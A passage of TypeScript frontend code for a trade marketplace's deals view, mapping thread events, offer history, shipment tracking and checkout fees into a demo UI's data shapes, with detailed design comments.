const ACCEPTANCE_DM_RE = /Your (?:offer|trade) on .+ was accepted!/;
export function isAcceptanceDm(body: string): boolean {
  return ACCEPTANCE_DM_RE.test(body) && /Offers tab/i.test(body);
}
const OFFER_CHIP_RE = /^\[Offer: /;
const OFFER_CHIP_ID_RE = /^\[Offer: ([^\]|]+)/;
const SHARED_LISTING_RE = /^\[Shared listing: ([^\]]+)\]$/;
/** The app's own words for a chip whose offer is not a card in this thread. */
export const OFFER_CHIP_FALLBACK = "Offer update — see Deals";
/** The words for "[Shared listing: id]" wherever a card cannot go: the row
 *  line, the notifications drawer, a bubble whose listing nobody knows, and the
 *  composer's own pending bubble (dealMessaging.ts). Never the raw token. */
export const SHARED_LISTING_FALLBACK = "Shared a listing";
/** The mark on a painted line the server's lastReceivedAt never counts (see
 *  mapThreadDetail below and the bridge's __gbzPaintedReceivedMs). */
const UNCOUNTED = { __gbzUncounted: true } as const;

/**
 * Maps one events response onto the fields the LIST left empty.
 *
 * Pure, so every decision above is testable without a network or a DOM.
 */
export function mapThreadDetail(input: {
  res: ApiThreadEventsResponse;
  myUserId: string;
  counterpartHandle: string;
  /** Which chain this Blake thread represents — a person row carries several. */
  listingId: string | null;
}): DemoThreadDetail {
  const { res, myUserId, counterpartHandle, listingId } = input;

  /* THE CONVERSATION, as the visitor should read it. Two jobs the raw stream
     does not do for us, both copied from the app (deal-thread/[key].tsx):

       1. DROP the server's own bookkeeping rows. Accepting an offer writes an
          acceptance DM and an "[Offer: id|type|cash|title|listingId]" chip as
          the seller; the app hides the first (isAcceptanceDm) and the second
          when its offer already renders as a card in the thread, and shows
          "Offer update — see Deals" for a chip whose offer is not in it. The
          website printed both raw. It is a DISPLAY rule, so old threads are
          cleaned up too and nothing is rewritten server-side.
       2. ADD the note typed with an offer, counter or Exchange. It lives only
          on the offer row (offers.message), never as a message, so without
          this the sender cannot see what they said.
       3. MARK (UNCOUNTED) the two lines painted here that the server's
          lastReceivedAt never counts: the "Offer update — see Deals" stand-in
          for an "[Offer: " chip (the server skips every such message), and an
          offer's note (not a message at all). The read state's hold compares
          the newest line painted from them with lastReceivedAt, so it must
          count the same lines (the bridge's __gbzPaintedReceivedMs).

     The same filtered list is what the thread-list preview reads (personRow
     takes the last of msgs), so the "You: [Offer: …]" line goes with it. */
  const offerIds = new Set<string>();
  for (const e of res.events) if (e.type === "offer") offerIds.add(e.offer.id);

  const msgs: DemoThreadDetail["msgs"] = [];
  for (const e of res.events) {
    if (e.type === "message") {
      const body = e.message.body;
      if (isAcceptanceDm(body)) continue;
      let text = body;
      let uncounted = false;
      let sharedLid: string | null = null;
      let item: DemoThreadItem | null = null;
      if (OFFER_CHIP_RE.test(body)) {
        const chipId = body.match(OFFER_CHIP_ID_RE)?.[1] ?? null;
        if (chipId && offerIds.has(chipId)) continue;
        text = OFFER_CHIP_FALLBACK;
        uncounted = true;
      } else if (SHARED_LISTING_RE.test(body)) {
        /* The app paints a card for this body, and so does the website now: the
           words stay as the line (the row line and the drawer read them), and
           the card rides as `item` when the events response names the listing.
           When it does not, the id rides as __gbzSharedLid and the bridge asks
           the floor and the closet (__gbzInstallDealThread). */
        text = SHARED_LISTING_FALLBACK;
        sharedLid = SHARED_LISTING_RE.exec(body)![1];
        const known = res.listings?.[sharedLid];
        if (known) {
          item = {
            title: known.title ?? "",
            image: safeUrl(known.images?.[0] ?? null),
            lid: sharedLid,
            value: listingSideValue(known),
          };
        }
      }
      msgs.push({
        // "me" is Blake's own sentinel — threadRow compares `last.from === "me"`
        // to prefix "You: ". Anything else is rendered as the counterpart.
        from: e.message.senderId === myUserId ? "me" : counterpartHandle,
        text,
        when: stamp(e.at),
        at: e.at,
        ...(uncounted ? UNCOUNTED : {}),
        ...(sharedLid ? { __gbzSharedLid: sharedLid } : {}),
        ...(item ? { item } : {}),
      });
    } else if (e.type === "offer") {
      const note = e.offer.message?.trim();
      if (!note) continue;
      msgs.push({
        from: (e.offer.proposedByUserId ?? e.offer.fromUserId) === myUserId ? "me" : counterpartHandle,
        text: note,
        when: stamp(e.at),
        at: e.at,
        ...UNCOUNTED,
      });
    }
  }

  /* HISTORY = the SUPERSEDED parents of this chain. A superseded offer is by
     definition one a counter replaced, which is exactly what dealState's
     isCountered() tests, so "COUNTERED" is READ OFF that fact rather than
     invented. The events route does not carry the derived triple (the LIST
     does), and deriving a richer word here would mean re-expressing the state
     machine in the browser — the thing this lane has refused three times. */
  const history = res.events
    .filter((e): e is Extract<ApiThreadEvent, { type: "offer" }> => e.type === "offer")
    .filter((e) => e.isSuperseded)
    .filter((e) => listingId === null || e.listingId === listingId)
    .map((e) => {
      const iAmBuyer = e.offer.fromUserId === myUserId;
      const author = e.offer.proposedByUserId ?? e.offer.fromUserId;
      const offered = offeredToItems(e.offer.offeredItems);
      const listing = res.listings[e.listingId];
      /* The SECOND instance of the same $0, found by the same reasoning: an
         Offer History row's listing side went through the identical
         `value: null` fallback, and a superseded chain's listing is just as
         likely to have left LISTINGS. Fixed from the response we already had
         — see listingSideValue and the events-listings type note above. */
      const listingItem: DemoThreadItem = {
        title: listing?.title ?? "",
        image: safeUrl(listing?.images?.[0] ?? null),
        lid: e.listingId,
        value: listing ? listingSideValue(listing) : null,
      };
      const cash = buyerSideCash(e.offer, iAmBuyer);
      // The seller's half, same rule as the list row — and the same reason. The
      // history is what someone scrolls back through when they are already
      // suspicious about a charge, so a straight swap here is the defect one
      // screen deeper, at the moment it is most likely to be looked for.
      const requestedCash = e.offer.requestedCashAmount ?? 0;
      const mine = iAmBuyer ? mapSide("me", offered, cash) : mapSide("me", [listingItem], requestedCash);
      const theirs = iAmBuyer
        ? mapSide(counterpartHandle, [listingItem], requestedCash)
        : mapSide(counterpartHandle, offered, cash);
      return {
        who: author === myUserId ? "me" : counterpartHandle,
        // sideSum truncates titles at the first comma by design; the summary is
        // the cash figure when there is one, which is what his fixture shows.
        summary: cash ? demoMoney(cash) : offered.map((i) => i.title).join(" + "),
        state: "COUNTERED",
        when: stamp(e.at),
        at: e.at,
        // 🪤 sideRows is gated on h.hMine ALONE (app.js:1930) and then
        // dereferences h.hTheirs.items — so BOTH must be present or neither.
        hMine: mine,
        hTheirs: theirs,
      };
    });

  /* TRACKING. Only the chain this thread represents, and only once something
     has actually shipped — his overlay is guarded (`t.tracking ?`), so null is
     the correct "no shipment yet" and an empty legs array would paint an empty
     panel. */
  let tracking: DemoThreadDetail["tracking"] = null;
  const latest = res.events.find(
    (e): e is Extract<ApiThreadEvent, { type: "offer" }> =>
      e.type === "offer" && e.isLatest && (listingId === null || e.listingId === listingId),
  );
  if (latest) {
    const t = res.tracking[latest.offer.id];
    if (t) {
      const iAmBuyer = latest.offer.fromUserId === myUserId;
      const listing = res.listings[latest.listingId];
      const listingTitle = listing?.title ?? "";
      const offeredTitle = offeredToItems(latest.offer.offeredItems).map((i) => i.title).join(" + ");

      // The SELLER leg carries the listing; the BUYER leg carries the offered
      // items. `dir` is viewer-relative: "you" is the leg the viewer ships.
      /* THE VIEWER'S OWN LEG ONLY. The seller's leg for the seller (any paid
         order) and the buyer's leg for a buyer on an item or hybrid trade (a
         cash buyer ships nothing). Accepted only: a label that outlives a
         cancelled or completed deal has no drop-off left to make. */
      const shipFor = (side: "seller" | "buyer", hasLabel: boolean): DemoTrackingLeg["ship"] => {
        if (!hasLabel || latest.offer.status !== "accepted") return null;
        if ((side === "buyer") !== iAmBuyer) return null;
        if (side === "buyer" && latest.offer.offerType !== "item" && latest.offer.offerType !== "hybrid") return null;
        const shippedKind = side === "seller" ? "seller_shipped" : "buyer_shipped";
        const dropped = res.events.some(
          (e) => e.type === "system" && e.kind === shippedKind && e.listingId === latest.listingId,
        );
        return { offerId: latest.offer.id, side, dropped };
      };
      const sellerHasLabel = latest.offer.qrCodeUrl !== null;
      const buyerHasLabel = latest.offer.buyerQrCodeUrl !== null;
      const sellerLeg = mapLeg(
        iAmBuyer ? "them" : "you",
        listingTitle,
        t.seller,
        sellerHasLabel,
        iAmBuyer && !latest.offer.buyerConfirmed,
        shipFor("seller", sellerHasLabel),
      );
      const buyerLeg = mapLeg(
        iAmBuyer ? "you" : "them",
        offeredTitle,
        t.buyer,
        buyerHasLabel,
        !iAmBuyer && !latest.offer.sellerConfirmed,
        shipFor("buyer", buyerHasLabel),
      );

      // A cash sale has ONE leg. Emitting an empty buyer leg would draw a
      // shipment panel for a parcel nobody is sending.
      const legs = [sellerLeg];
      if (t.buyer.trackingNumber || t.buyer.events.length || latest.offer.buyerQrCodeUrl) legs.push(buyerLeg);
      if (legs.some((l) => l.events.length || l.status !== "LABEL PENDING")) tracking = { legs };
    }
  }

  /* `latest` is the head of this chain. Its STATUS is on the events wire (shipFor
     above reads `latest.offer.status`), but this value is still not a claim
     that the deal is accepted — mapThreadFees re-checks that against the
     server's own `status`. All this carries is "which offer". */
  const acceptedOfferId = latest?.offer.id ?? null;

  /* 🔴 The dispute flag, keyed to THIS chain's live offer and no other.
     `openDisputeOfferIds` is pair-wide — a person row can carry several chains
     and the visitor may be disputing a different one — so a bare
     `res.openDisputeOfferIds.length > 0` would freeze the CTA on every deal
     with that counterpart. Membership of the head offer is the question.

     `?? []` because the field is display-only and the route FAILS OPEN on a
     lookup error (it logs and returns an empty array rather than falsely
     painting DISPUTE OPEN). An older response that predates the field reads
     the same way: no evidence of a dispute is not evidence of one. */
  const disputed =
    acceptedOfferId !== null && (res.openDisputeOfferIds ?? []).includes(acceptedOfferId);

  return { msgs, history, tracking, acceptedOfferId, conversationId: res.conversationId ?? null, disputed };
}

/**
 * GET /api/offers/:id/trade-checkout-summary — the per-party fee breakdown.
 *
 * Only the fields this lane reads. `unified` is null for cash and coin_flip
 * offers, and the legacy top-level fields that stand in for it are NOT usable
 * here: `platformFeeDollars` falls back to
 * `Math.max(2.0, (declaredValue + offeredValue) * 0.065)` when the real fee is
 * absent, which INVENTS a number on a money surface, in dollars against a canon
 * that works in cents. Deliberately not typed, so it cannot be reached for.
 */
export interface ApiTradeCheckoutSummary {
  offerId: string;
  status: string;
  isBuyer: boolean;
  /* 🪤 THESE THREE ARE TOP-LEVEL, AND totalDollars/itemValueDollars ARE NOT.
     The endpoint mixes the two levels and it is easy to reach for the wrong
     one: offerId / status / isBuyer / myCheckoutComplete / otherCheckoutComplete
     / bothCheckoutsComplete sit at the top (offers.ts:2136-2193), while every
     MONEY figure lives under `unified` — which is null for cash and coin_flip
     offers, because isUnifiedTrade is `offerType === "item" || "hybrid"`
     (offers.ts:2073). Writing `summary.totalDollars` compiles against a wider
     object and yields undefined on a money surface.

     Optional here rather than required, deliberately. The server emits all
     three unconditionally, but this interface is a HAND-WRITTEN MIRROR of a
     bare `res.json({...})` literal — the route declares no return type, no zod
     schema and no serializer, so nothing makes the two agree except this
     comment and the tests. Marking them required would only force every test
     fixture to restate them, and the fixtures cast with `as
     ApiTradeCheckoutSummary` anyway, so it would buy no real enforcement.

     Absence therefore has to mean something, and it means NOT COMPLETE. That
     is the safe direction: defaulting to "complete" would hide the pay control
     from someone who has not paid, which blocks a real payment. Defaulting to
     "not complete" at worst leaves today's behaviour exactly as it is. */
  myCheckoutComplete?: boolean;
  otherCheckoutComplete?: boolean;
  bothCheckoutsComplete?: boolean;
  unified: {
    depositDollars: number;
    itemValueDollars: number;
    cashLegDollars: number;
    processingFeeDollars: number;
    coverageFeeDollars: number;
    barterTaxDollars: number;
    shippingDollars: number;
    totalDollars: number;
    /* Conditional in the JSON, not merely optional in TypeScript: the server
       leaves all three `undefined` unless creditPeek.creditCents > 0, so they
       are omitted from the response entirely rather than sent as zero
       (offers.ts:2165-2170, "no zero-value line, ever"). */
    creditAppliedDollars?: number;
    processingFeeAfterCreditDollars?: number;
    coverageFeeAfterCreditDollars?: number;
  } | null;
}

/**
 * The checkout facts Blake's `t.fees` cannot carry.
 *
 * DemoThreadFees is exactly his six fee lines because feeBlock (app.js:2529)
 * sums those six and prints the result as its own total — widening it would
 * make his total stop tying out. So everything else the checkout screen needs
 * travels here instead, on a separate channel, and his shape is left alone.
 */
export interface DemoCheckoutContext {
  offerId: string;
  isBuyer: boolean;
  /** Under `unified`, and null when the server sent no breakdown. */
  totalDollars: number | null;
  itemValueDollars: number | null;
  /** Absent from the JSON unless a credit was actually burned. */
  creditAppliedDollars: number | null;
  myCheckoutComplete: boolean;
  otherCheckoutComplete: boolean;
  bothCheckoutsComplete: boolean;
}

/**
 * Maps the summary into the context channel.
 *
 * Total and item value are read from `unified` and stay NULL when it is null,
 * rather than being coerced to 0 — a cash or coin_flip offer has no canonical
 * breakdown at all (offers.ts:2073), and zero is a price. Nothing downstream
 * may print a figure this returns as null.
 */
export function mapCheckoutContext(res: ApiTradeCheckoutSummary): DemoCheckoutContext {
  const u = res.unified;
  return {
    offerId: res.offerId,
    isBuyer: res.isBuyer,
    totalDollars: u ? u.totalDollars : null,
    itemValueDollars: u ? u.itemValueDollars : null,
    creditAppliedDollars: u && typeof u.creditAppliedDollars === "number" ? u.creditAppliedDollars : null,
    myCheckoutComplete: res.myCheckoutComplete === true,
    otherCheckoutComplete: res.otherCheckoutComplete === true,
    bothCheckoutsComplete: res.bothCheckoutsComplete === true,
  };
}

/** Blake's `t.fees`, exactly (app.js:1814 feeBlock). */
export interface DemoThreadFees {
  deposit: number;
  cashLeg: number;
  processing: number;
  service: number;
  barterTax: number;
  shipping: number;
}

/**
 * The six fee lines, or null.
 *
 * 🔑 His total and ours are the SAME ARITHMETIC. feeBlock computes
 * `deposit + cashLeg + processing + service + barterTax + shipping`
 * (app.js:1817); tradeCheckout.ts:387 computes
 * `depositCents + cashLegCents + processingFeeCents + coverageFeeCents +
 * barterTaxCents + shippingCents`. Same six terms, same order. So mapping the
 * GROSS dollar values makes his "TOTAL DUE NOW" equal our `totalDollars` by
 * construction rather than by coincidence — no eighth expression of the fee
 * rule is introduced here.
 *
 * 🔴 GROSS, not after-credit, and that is forced rather than chosen.
 * `totalCents` is gross and the payment intent charges `totalCents − credit`,
 * but Blake's block has no credit row. Mapping the after-credit twins would make
 * his own lines stop summing to his own total and turn his hardcoded
 * "(6.5%, min $2)" label into a false statement. Gross also errs in the safe
 * direction: a credit holder is charged LESS than the screen says, never more.
 * The missing credit row is Blake's to add.
 *
 * 🔴 Two refusals, both of which paint nothing rather than paint a wrong number:
 *
 *   status !== "accepted"   Truthy fees are what make #/checkout/<id> resolvable
 *                           (app.js:3714). Gated on the SERVER's status, never
 *                           on the row we mapped earlier, so a stale or
 *                           optimistic client row cannot open checkout. This is
 *                           the honest half of what app.js:5009 fakes.
 *   unified === null        Cash and coin_flip have no canonical breakdown, and
 *                           the legacy fallback fabricates one.
 *
 * And a non-finite anywhere in the six is also null: feeBlock sums all six
 * UNGUARDED, so one `undefined` paints "TOTAL DUE NOW $NaN". Refusing to price
 * beats pricing wrongly.
 */
export function mapThreadFees(res: ApiTradeCheckoutSummary): DemoThreadFees | null {
  if (res.status !== "accepted") return null;
  const u = res.unified;
  if (!u) return null;

  const fees: DemoThreadFees = {
    deposit: u.depositDollars,
    cashLeg: u.cashLegDollars,
    processing: u.processingFeeDollars,
    service: u.coverageFeeDollars,
    barterTax: u.barterTaxDollars,
    shipping: u.shippingDollars,
  };
  for (const v of Object.values(fees)) {
    if (typeof v !== "number" || !Number.isFinite(v)) return null;
  }
  return fees;
}

/**
 * Fetch and install the fee lines for one thread.
 *
 * ⚠️ This is the ONE live-vendor call in the lane: `shippingCents` is a live
 * finalized Shippo rate. It is affordable because Blake only paints fees behind
 * BOTH `summaryOpen` and `t.accepted` (app.js:1886), so it fires when a visitor
 * taps "Tap for summary ›" on an accepted deal — not per thread, and not per row.
 *
 * Every non-200 leaves fees unset rather than throwing, and two of them are
 * ordinary rather than exceptional: 422 `shipping_address_required` for a party
 * with no address on file, and 502 when Shippo cannot quote. Both are states a
 * real visitor reaches, and in both the honest screen is the one with no fee
 * block at all.
 */
export async function installThreadFees(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  threadId: string,
): Promise<boolean> {
  const bridge = (
    win as unknown as {
      __gbzInstallThreadFees?: (id: string, fees: DemoThreadFees | null) => boolean;
    }
  ).__gbzInstallThreadFees;
  if (typeof bridge !== "function") {
    throw new Error("installThreadFees: bridge script has not run yet (__gbzInstallThreadFees missing)");
  }

  const offerId = (
    win as unknown as { __gbzThreadOfferId?: (id: string) => string | null }
  ).__gbzThreadOfferId?.(threadId) ?? null;
  if (!offerId) return false;

  const res = await authFetch(`/api/offers/${encodeURIComponent(offerId)}/trade-checkout-summary`);
  if (!res.ok) {
    console.warn(`[web-install] deals: fees for ${threadId} unavailable (${res.status}) — no fee block`);
    return false;
  }
  const summary = (await res.json()) as ApiTradeCheckoutSummary;
  return applyTradeCheckoutSummary(win, threadId, summary);
}

/**
 * Installs one fetched summary: the checkout context, then the fee lines.
 *
 * Shared by the summary toggle above and the checkout route's own entry fetch
 * (checkoutContext.ts), so the ORDER below cannot be written twice and drift.
 * Returns whether fees landed on the row.
 */
export function applyTradeCheckoutSummary(
  win: Window,
  threadId: string,
  summary: ApiTradeCheckoutSummary,
): boolean {
  const bridge = (
    win as unknown as {
      __gbzInstallThreadFees?: (id: string, fees: DemoThreadFees | null) => boolean;
    }
  ).__gbzInstallThreadFees;
  if (typeof bridge !== "function") return false;

  /* 🔴 CONTEXT IS INSTALLED FIRST, AND THE ORDER IS LOAD-BEARING.
     __gbzInstallThreadFees repaints (rerenderKeepScroll), and checkoutContext.ts
     watches the DOM for exactly that repaint to decide whether the pay control
     should still be offered. Installing fees first would fire that observer
     against a row whose context has not landed, which reads as "not known" —
     so the control would be offered for one frame to someone who already paid.
     One frame of a false offer is still a false offer.

     Unconditional, and NOT gated on `fees` being non-null: a cash or coin_flip
     offer has no canonical breakdown (unified is null, offers.ts:2073) so
     mapThreadFees refuses it, but myCheckoutComplete is top-level and true for
     it just the same. Returning early on a null fees would drop the completion
     state for precisely the offers that have no other way to know. */
  const ctxBridge = (
    win as unknown as {
      __gbzInstallCheckoutContext?: (id: string, ctx: DemoCheckoutContext) => boolean;
    }
  ).__gbzInstallCheckoutContext;
  if (typeof ctxBridge === "function") ctxBridge(threadId, mapCheckoutContext(summary));

  const fees = mapThreadFees(summary);
  if (!fees) return false;
  return bridge(threadId, fees);
}

/**
 * Fetches one thread's detail and installs it through the bridge.
 *
 * The thread id our mapper emits IS a server key — `d:<counterpartId>:<listingId>`
 * for a deal, `p:<counterpartId>` for a chat-only row — so it round-trips
 * without a lookup table. The `d:` alias resolves server-side to the person plus
 * a focusListingId, which is exactly the chain this Blake thread represents.
 *
 * BEST-EFFORT, per-thread: the list already installed a fully-shaped row with
 * empty msgs/history and null tracking, all of which Blake's own code guards, so
 * a failure here leaves the thread readable rather than breaking the view.
 */
export async function installDealThread(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  threadId: string,
  myUserId: string,
): Promise<boolean> {
  const bridge = (
    win as unknown as {
      __gbzInstallDealThread?: (id: string, detail: DemoThreadDetail) => boolean;
    }
  ).__gbzInstallDealThread;
  if (typeof bridge !== "function") {
    throw new Error("installDealThread: bridge script has not run yet (__gbzInstallDealThread missing)");
  }

  const res = await authFetch(`/api/deal-threads/${encodeURIComponent(threadId)}/events`);
  if (!res.ok) {
    console.warn(`[web-install] deals: thread ${threadId} events failed (${res.status}) — left as installed`);
    return false;
  }
  const body = (await res.json()) as ApiThreadEventsResponse;
  /* 🔑 THE LIST FIRST WHEN IT IS STALE BEHIND THIS BODY (the adversarial pass on
     the live-offers build, 2026-10-22). The loader's first read of a thread, and
     the composer's re-read after a send, moved the writers' offer id to a head
     the card did not show yet (the card's words and sides are the list's), for
     up to one poll beat: a visitor could accept $80 off a card that said $100.
     So the poll's rule (listIsStale) runs here too: when this body's chain heads
     are not what the list last said about this person, the list is read and
     applied for this person only, before the events, in one pass. After an
     action's own list re-read the heads match and nothing extra is read. A
     failed list read installs the events anyway: this is a one-shot read with
     no next beat, and a thread left empty would cost more than a card one beat
     behind, which the poll's next beat reconciles. */
  const list = listIsStale(body, listHeadsFor(win, threadId)) ? await readDeals(win, authFetch, myUserId) : null;
  return installListThenEvents(win, threadId, myUserId, body, list).installed;
}

/**
 * Window-level bookkeeping shared by everything that writes a thread, so the
 * background poll can tell that its answer is already out of date.
 *
 *   inFlight  composer sends currently on the wire.
 *   epoch     bumped when a send starts or ends and whenever a thread's events
 *             are installed. A poll remembers the epoch it started at and drops
 *             its answer if the number moved: something newer got there first,
 *             and the poll's answer predates it.
 *
 * On the window, not in module state, because the tests (and a hot reload) run
 * several windows through one module.
 */
export interface ThreadWrites {
  inFlight: number;
  epoch: number;
}
export function threadWrites(win: Window): ThreadWrites {
  const w = win as Window & { __gbzThreadWrites?: ThreadWrites };
  return (w.__gbzThreadWrites ??= { inFlight: 0, epoch: 0 });
}

/**
 * Maps one events response onto the installed rows for its counterpart and
 * pushes it through the bridge. The half of installDealThread after the fetch,
 * split out so the background poll can fetch on its own terms (it has to decide
 * whether the answer is still wanted before anything repaints).
 */
export function installThreadEvents(
  win: Window,
  threadId: string,
  myUserId: string,
  body: ApiThreadEventsResponse,
): boolean {
  const bridge = (
    win as unknown as {
      __gbzInstallDealThread?: (id: string, detail: DemoThreadDetail) => boolean;
    }
  ).__gbzInstallDealThread;
  if (typeof bridge !== "function") {
    throw new Error("installDealThread: bridge script has not run yet (__gbzInstallDealThread missing)");
  }

  /* The counterpart handle has to come from the row we already installed, not
     from this response: the events payload carries usernames only on message
     senders, so a thread with no messages has none. Reading it back off THREADS
     also guarantees the same value the list used, which is what USERS is keyed
     by. */
  const handle = (
    win as unknown as { __gbzThreadHandle?: (id: string) => string | null }
  ).__gbzThreadHandle?.(threadId) ?? null;
  if (!handle) {
    console.warn(`[web-install] deals: thread ${threadId} is not installed — skipping detail`);
    return false;
  }

  /* ONE fetch, EVERY chain (Blake 2026-09-02: one thread per person). The
     events payload is the whole pair, so every deal row of this counterpart
     takes its own chain's history and tracking from it, and ALL of them take
     the SAME conversation: one msgs array by reference, so the person view
     reads one conversation and a message that lands in any row is in all.
     Before this, the first opened deal got the messages and every other deal
     with the same person never did. */
  const parts = threadId.split(":");
  const counterpartId = parts[1] ?? "";
  const focus = threadId.startsWith("d:") ? parts[2] ?? null : null;
  const chainIds = Object.keys(body.listings ?? {});
  const targets = threadId.startsWith("p:") ? [threadId] : chainIds.map((lid) => `d:${counterpartId}:${lid}`);
  if (focus && !chainIds.includes(focus)) targets.push(threadId);
  let shared: DemoThreadDetail["msgs"] | null = null;
  let installed = false;
  for (const id of targets) {
    const listingId = id.startsWith("d:") ? id.split(":")[2] ?? null : null;
    const detail = mapThreadDetail({ res: body, myUserId, counterpartHandle: handle, listingId });
    if (shared) detail.msgs = shared;
    else shared = detail.msgs;
    if (bridge(id, detail)) installed = true;
  }
  threadWrites(win).epoch++;
  return installed;
}

/** What the list last said about one of a person's deals: one entry of the bridge's __gbzPersonHeadOffers. */
export interface ListHead {
  listingId: string;
  offerId: string | null;
  status: string | null;
  updatedAt: string | null;
}

type ListHeadsWindow = Window & {
  __gbzPersonHeadOffers?: (threadId: string) => ListHead[] | null;
  __gbzThreadHandle?: (threadId: string) => string | null;
  __gbzThreadIdForUser?: (userId: string) => string | null;
};

/** The counterpart a thread key names: d:<id>:<listing> and p:<id> both carry it. */
const threadPerson = (threadId: string): string => threadId.split(":")[1] ?? threadId;

/** The list's heads for the person a thread id names, off the installed rows; null for an id that names nobody. */
export function listHeadsFor(win: Window, threadId: string): ListHead[] | null {
  return (win as ListHeadsWindow).__gbzPersonHeadOffers?.(threadId) ?? null;
}

type OfferEventOnWire = Extract<ApiThreadEvent, { type: "offer" }>;

/**
 * Has the list gone stale behind this events body? For each chain in the body
 * (its latest offer, isLatest), the person's list row for that listing is
 * compared on three stamps: the list is stale when there is NO row for the
 * chain (a deal on a new listing, or a chat-only person's first deal), when the
 * row's head offer id differs (a counter, theirs or the visitor's own that a
 * failed re-read left behind), when its status differs (an accept, a decline,
 * a withdraw), or when its updatedAt differs (a payment, a label, a step the
 * list words differently). A field missing on EITHER side is unknown and never
 * a difference (an older fixture or an older server stays valid). `heads` null
 * (an id that names no person) is never stale. Read by the open-thread poll
 * (dealThreadPoll.ts) on every beat and by installDealThread on every one-shot
 * read, so the two readers of a thread cannot disagree about when the list is
 * behind it.
 */
export function listIsStale(body: ApiThreadEventsResponse, heads: ListHead[] | null): boolean {
  if (!heads) return false;
  const latest = new Map<string, OfferEventOnWire>();
  for (const e of body.events ?? []) {
    if (e.type === "offer" && e.isLatest) latest.set(e.listingId, e);
  }
  for (const [listingId, e] of latest) {
    const row = heads.find((h) => h.listingId === listingId);
    if (!row) return true;
    if (row.offerId && row.offerId !== e.offer.id) return true;
    if (row.status && e.offer.status && row.status !== e.offer.status) return true;
    const listAt = Date.parse(row.updatedAt ?? "");
    const headAt = Date.parse(e.offer.updatedAt ?? "");
    if (!Number.isNaN(listAt) && !Number.isNaN(headAt) && listAt !== headAt) return true;
  }
  return false;
}

/**
 * A list read applied for ONE person, then an events body installed onto the
 * rows it left: the order every reader of a thread uses when the list was stale
 * behind the body (installDealThread; the poll inside its keep-your-place
 * bracket). The list goes on first so the new row of a deal on a new listing
 * exists for the events to fill (its history, the writers' offer id), and so the
 * writers' offer id never moves to a head the card does not show. With no list
 * the events go on alone. A chat-only row (p:<id>) the list turned into deal
 * rows is gone, and so is a deal row the read no longer carries, so the install
 * re-targets any row of the person that stands now (every chain of theirs is
 * installed from one body, installThreadEvents). Returns the id installed onto,
 * for a caller that keys its own memory by it.
 */
export function installListThenEvents(
  win: Window,
  threadId: string,
  myUserId: string,
  body: ApiThreadEventsResponse,
  list: DealsRead | null,
): { installId: string; installed: boolean } {
  const w = win as ListHeadsWindow;
  let installId = threadId;
  if (list && w.__gbzThreadHandle?.(threadId)) {
    applyDeals(win, list, threadPerson(threadId));
    if (!w.__gbzThreadHandle?.(threadId)) installId = w.__gbzThreadIdForUser?.(threadPerson(threadId)) ?? threadId;
  }
  return { installId, installed: installThreadEvents(win, installId, myUserId, body) };
}

/**
 * The thread renderDeals painted into its detail pane, read off the DOM, or null
 * on an empty list or another route: the row marked "on" when dealsSel names one,
 * otherwise the first row, which is what his `personFor(persons, dealsSel)` falls
 * back to (`|| persons[0]`). Either way the answer is that row's data-selthread,
 * the person's latest deal id. The detail loader's rule, unchanged.
 *
 * ⚠️ ONE IDENTICAL COPY remains, in dealMessaging.ts:116-122
 * (`openThreadIdFromDom`), read by the open-thread poll and the deal composer.
 * With nothing selected the first row IS the pane's person (renderDeals' own
 * fallback), and the Deals order (app.js dealsOrdered) keeps it there when a
 * thread is read: under the old unread-first sort, reading the first row's person
 * sent the first row, and the pane with it, to the next unread person.
 *
 * ⚠️ PAINTED, NOT NECESSARILY SEEN, AND NOT NECESSARILY CHOSEN. Up to 1024px the
 * stylesheet hides the pane unless a thread is SELECTED (a tapped row, a tab, a
 * floor card, an offer or Activity row), so on a phone this still names the
 * default person while the list is what shows; and when a selection is off the
 * tab being shown (on a computer, Account > Orders or a tile's no-match action
 * with a selection from another tab; an accept, a decline or a withdraw no longer
 * leaves one there, since the list read moves the tab with the selected deal,
 * __gbzRefreshDeals), the fallback first row is a person nobody chose. That is
 * why the deal composer reads its copy before dealsSel: it sends to the person on
 * screen. The detail loader wants exactly this answer (it reads what
 * is painted); dealsReadState.ts asks a stricter question (threadOnScreen there)
 * and uses this only for a computer's thread that opened with nothing selected.
 */
export function paneThreadId(doc: Document): string | null {
  const openRow = doc.querySelector(".thread-row.on, .thread-view [data-threadcta]");
  const row = openRow?.closest?.("[data-selthread]") as HTMLElement | null;
  if (row?.dataset.selthread) return row.dataset.selthread;
  const first = doc.querySelector("[data-selthread]") as HTMLElement | null;
  return first?.dataset.selthread ?? null;
}

/**
 * Loads a thread's detail when the visitor actually opens it.
 *
 * ⚠️ NOT a hashchange listener. Blake selects a thread with a `[data-selthread]`
 * CLICK that mutates `dealsSel` and calls rerenderKeepScroll() — the URL never
 * changes, so the mechanism installLiveListingComments uses (hashchange, because
 * "did they land on a new listing" is a navigation question) does not fire here.
 * A capture-phase click listener on the document does, and it is the same
 * mechanism WebInstall.tsx already uses for its cross-route guard.
 *
 * ⚠️ AND renderDeals OPENS ONE BY DEFAULT — `sel = list.find(...) || list[0]` —
 * so arriving at #/deals already has a thread on screen that nobody clicked.
 * That is what the initial pass is for; without it the first thread a visitor
 * sees is the one thread that never loads.
 *
 * Cached per id for the life of the tab, and NOT retried on failure — the same
 * one-attempt, silent-degrade posture as the rest of this file. Returns a
 * teardown that removes the listener, which the tests need because they share
 * one jsdom window across cases.
 */
export function installDealThreadLoader(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId: string,
): () => void {
  const attempted = new Set<string>();

  const load = (threadId: string | null): void => {
    /* Keyed by COUNTERPART, not by deal: one fetch installs every chain of a
       person (installDealThread), so a second deal of the same person is
       already loaded. */
    if (!threadId) return;
    const key = threadId.split(":")[1] ?? threadId;
    if (attempted.has(key)) return;
    attempted.add(key);
    installDealThread(win, authFetch, threadId, myUserId).catch((err) => {
      console.error(`[web-install] deals: thread ${threadId} detail not installed:`, err);
    });
  };

  /* The thread currently open in the detail pane. renderDeals ALWAYS opens one
     (`sel = list.find(...) || list[0]`), so "none" only happens on an empty
     list. Shared by the boot sweep and the summary toggle so the two cannot
     disagree about which thread is on screen. */
  const currentThreadId = (): string | null => paneThreadId(win.document);

  /* Fees are fetched on the SUMMARY TOGGLE, not on thread open, because that is
     where Blake gates them: `summaryOpen && t.accepted` (app.js:1886). The
     summary starts closed and `attemptedFees` allows exactly one attempt, so the
